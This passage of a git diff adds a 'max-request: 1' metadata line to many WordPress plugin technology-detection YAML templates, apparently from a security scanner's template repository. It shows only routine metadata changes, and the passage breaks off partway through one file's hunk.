 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
